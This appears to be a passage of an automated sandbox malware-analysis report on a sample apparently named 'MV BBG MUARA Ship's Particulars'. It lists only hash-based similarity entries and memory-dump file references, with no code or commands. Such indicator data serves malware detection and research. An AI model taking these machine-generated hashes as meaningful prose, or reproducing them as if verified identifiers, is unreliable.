• Instruction ID: 7a1f4951c09f3c74109868b59dd7d00c309ef33fbf39b87eb230a2b57a4b9c81
• Opcode Fuzzy Hash: 52f5b63460a8f7d76fefeb1817a9f8e9897c4faf369aa7320b81f61606f32903
• Instruction Fuzzy Hash: DA318030E102099FCB15DF68D99469EB7B6FF89300F20C529E906EB754DB71AD86CB90
Memory Dump Source
• Source File: 00000004.00000002.4193172108.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_6910000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: bf70ccf01f41b703621f035d1686f1ead677646bd1dad38d3b3c3d90071b4537
                                                                                                                  • Instruction ID: 0c4de203181aa6f5772b36efb248ba791ddfa36ee95d4ad73e7f9ada6d7d2bc2
                                                                                                                  • Opcode Fuzzy Hash: bf70ccf01f41b703621f035d1686f1ead677646bd1dad38d3b3c3d90071b4537
                                                                                                                  • Instruction Fuzzy Hash: D7316130E102099FCB15DF68D89469EB7B6FF89300F20C529E906EB754DB71AD86CB90
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.4193172108.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6910000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 105c66b9f42709406fce21033c880cf391c75f718b365002e6336ed2b8473596
                                                                                                                  • Instruction ID: 057b1e773d67e270200f162cb807804b2dff4f72628ed6146e56f1ca294f02e2
                                                                                                                  • Opcode Fuzzy Hash: 105c66b9f42709406fce21033c880cf391c75f718b365002e6336ed2b8473596
                                                                                                                  • Instruction Fuzzy Hash: F0218976F406199FDB40DFA9D980AAEBBF5EB48710F248429E905EB395E730DC008B90
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.4193172108.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6910000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: cfcb67df7ca1b26b455c3d0b3df6f76667e9f340764f6934795950e3a42a9fa5
                                                                                                                  • Instruction ID: 45968c45575337ffe74ff7672d2b6dc44c2190fbf5d6b5c465b105f95e66049d
                                                                                                                  • Opcode Fuzzy Hash: cfcb67df7ca1b26b455c3d0b3df6f76667e9f340764f6934795950e3a42a9fa5
                                                                                                                  • Instruction Fuzzy Hash: 25217C76F006199FDB40DFB9D980BAEB7F5AB48710F248425E915EB395E730D9018B90
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.4187309392.0000000000F7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F7D000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_f7d000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: c776ede5b8ae2cc2c7204f9b066d9a3e87e3d5c96569e7d156606acdba03eb22
                                                                                                                  • Instruction ID: c3bb565a1322711f66fb9001da115a108974df13b64eaaade1ce7477bfb12c9e
                                                                                                                  • Opcode Fuzzy Hash: c776ede5b8ae2cc2c7204f9b066d9a3e87e3d5c96569e7d156606acdba03eb22
                                                                                                                  • Instruction Fuzzy Hash: B1215E7150D3C09FC703CB24D994711BF71AF46224F29C5EBD8898F2A7C23A984ACB62
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.4187309392.0000000000F7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F7D000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_f7d000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 5cbcdc847318837339a49cb44c6ceef623df78d9f52d55f48137535f527d465a
                                                                                                                  • Instruction ID: f6a63a401a91a6d61b6c84ebd3944731d80622eaa68a0dbae2a0d92fc5f8f98f
                                                                                                                  • Opcode Fuzzy Hash: 5cbcdc847318837339a49cb44c6ceef623df78d9f52d55f48137535f527d465a
                                                                                                                  • Instruction Fuzzy Hash: A721D3B1504204DFDB14DF14D9C0B26BBB5FF84324F64C56AD94E4A25AC336D846EA62
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.4193172108.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6910000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 156ea2baadf8e7f720a2176595e01a05dc08b29be02a79e7fdce3bed6b588838
                                                                                                                  • Instruction ID: b2be67262b94a146492e849764d62a6c53d673c4831fce2a20a38a2192ec0eeb
                                                                                                                  • Opcode Fuzzy Hash: 156ea2baadf8e7f720a2176595e01a05dc08b29be02a79e7fdce3bed6b588838
                                                                                                                  • Instruction Fuzzy Hash: 7D11A136B045294FDF549A6CD9506AE73FAABC8310F108539C806EB358EF34DC028B90
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.4193172108.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6910000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 922abf72b6dbf7cddd6fcbb66b03e0f03989dd9bb858f440a659cb8a0871a594
                                                                                                                  • Instruction ID: 1fca119b064a0b077fbf64f8cf3327684de7775c4aa3d0e4360022e81e61fb49
                                                                                                                  • Opcode Fuzzy Hash: 922abf72b6dbf7cddd6fcbb66b03e0f03989dd9bb858f440a659cb8a0871a594
                                                                                                                  • Instruction Fuzzy Hash: AC019E31B001141BDB6196BD9844B1FB7DBDBC9B14F388829E10ADB745E965DC8243A2
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.4193172108.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6910000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: edca57857c4e7dee27148df558bf9407cb6fba481c5ffec83f956c7c406fe2f1
                                                                                                                  • Instruction ID: 8fe944d68b343b0e2ac09cecc9adff1d20d3c0ac8386282c30df6bca89c93211
                                                                                                                  • Opcode Fuzzy Hash: edca57857c4e7dee27148df558bf9407cb6fba481c5ffec83f956c7c406fe2f1
                                                                                                                  • Instruction Fuzzy Hash: 8C01F5307012450FCB139A78985471EBBE9EB8B650F20486EE18ACB351DA25DC038381
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.4193172108.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6910000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: c1bfbeac49dbd2633d85600d9a69fe8d3f375bb00f66e53f77811fc12f92bb7f
                                                                                                                  • Instruction ID: 813d2677def61c2453aeaa969defe579b9117ae9071b65b8906f9652d8f53e95
                                                                                                                  • Opcode Fuzzy Hash: c1bfbeac49dbd2633d85600d9a69fe8d3f375bb00f66e53f77811fc12f92bb7f
                                                                                                                  • Instruction Fuzzy Hash: CE21F4B1D00259AFCB10CF9AD985ADEFFB8FB48310F10812AE918A7600C375A550CFA5
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.4193172108.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6910000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 079845174994d7e1cb4eb52f9e5ba0e4f656ff28a6692645261c288abadaa72b
                                                                                                                  • Instruction ID: 0f97a4ce7f2124276285a8db0e39d6a8710b1fe8690c02fcda3d6d46b98c011b
                                                                                                                  • Opcode Fuzzy Hash: 079845174994d7e1cb4eb52f9e5ba0e4f656ff28a6692645261c288abadaa72b
                                                                                                                  • Instruction Fuzzy Hash: C9018435B000155FCB55DA7CD450B3BB7EADBC9620F24893EE50ACB341DD61DD428791
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.4193172108.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6910000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 97a61b74379d09a70ab5d0d44f78383e73b9635c1af5152b3bc3fb9fbe31a145
                                                                                                                  • Instruction ID: 148dd4ec33ee801a98fafc3c6fba87cecb31a0c9afc37c24ed0658b01669b656
                                                                                                                  • Opcode Fuzzy Hash: 97a61b74379d09a70ab5d0d44f78383e73b9635c1af5152b3bc3fb9fbe31a145
                                                                                                                  • Instruction Fuzzy Hash: F701B132B141195FDF549A6DA8102AF77FB9BC9210F24453AD80ADB248FB20CC0247D1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.4193172108.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6910000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 3243045c4873a9a5ea52314b7645d019ba13874d2becd5924d3f080b8a590a59
                                                                                                                  • Instruction ID: d6c5e23c8763c4cdbc65bf2e4c8ba378553951efa2fb8405e645aef072633e6e
                                                                                                                  • Opcode Fuzzy Hash: 3243045c4873a9a5ea52314b7645d019ba13874d2becd5924d3f080b8a590a59
                                                                                                                  • Instruction Fuzzy Hash: 8B11C2B1D00259AFCB10CF9AD985ACEFFB8FB48310F20812AE918A7200C374A554CFA5
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.4193172108.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6910000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 51d67c4405429439e99b9461b4e0ed3a9801a58807f6f8d97666f29541427c4e
                                                                                                                  • Instruction ID: 04303875e2905c8c1a27d449168fe3ec771fc95a9efae3cc486e47fcc8e86e8d
                                                                                                                  • Opcode Fuzzy Hash: 51d67c4405429439e99b9461b4e0ed3a9801a58807f6f8d97666f29541427c4e
                                                                                                                  • Instruction Fuzzy Hash: F9016D31B001141BDB6596ADD454B2FB3DEEBC9B20F348839E50ADB744DD65DC834391
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.4193172108.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6910000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 9d5bc98b91f538391facf771eeea4ed4cc1120268cf8299aac2f182a0686b57d
                                                                                                                  • Instruction ID: bc625609c61f1a28a6fdd1f6c3b584622b486fb3f58ef2934fbabe732e6ea201
                                                                                                                  • Opcode Fuzzy Hash: 9d5bc98b91f538391facf771eeea4ed4cc1120268cf8299aac2f182a0686b57d
                                                                                                                  • Instruction Fuzzy Hash: 2F018C35B100195BDB65967CA45073F73EADBC9620F34883AEA0ACB340EE65DD024381
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.4193172108.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6910000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 4291127f9b1b3d35f55f617421350aa4608b7b4d2079ee57013ea598725f44f8
                                                                                                                  • Instruction ID: b1cebdbe681051c8eb9abbeb955b358ae07f98394886ea699e104681a630dbce
                                                                                                                  • Opcode Fuzzy Hash: 4291127f9b1b3d35f55f617421350aa4608b7b4d2079ee57013ea598725f44f8
                                                                                                                  • Instruction Fuzzy Hash: 2A01A435B001185FCB52DABCD55471E73EAEB8A760F708829E10ACB754DE21DD038381
Memory Dump Source
• Source File: 00000004.00000002.4193172108.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_6910000_MV BBG MUARA Ship's Particulars.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e12ead7efe305b0c7768bc0008e52f7354f2a3483e1765a4375e71872d684c4c
• Instruction ID: c100164af45b4ee4d10705fc7358d03329e378f95438c42368eefef7c335b91a
• Opcode Fuzzy Hash: e12ead7efe305b0c7768bc0008e52f7354f2a3483e1765a4375e71872d684c4c
• Instruction Fuzzy Hash: AAE0D871E1524C5FDF50DEB08D6479A7B6E9B46204F3088E9D445CF582D532CA018340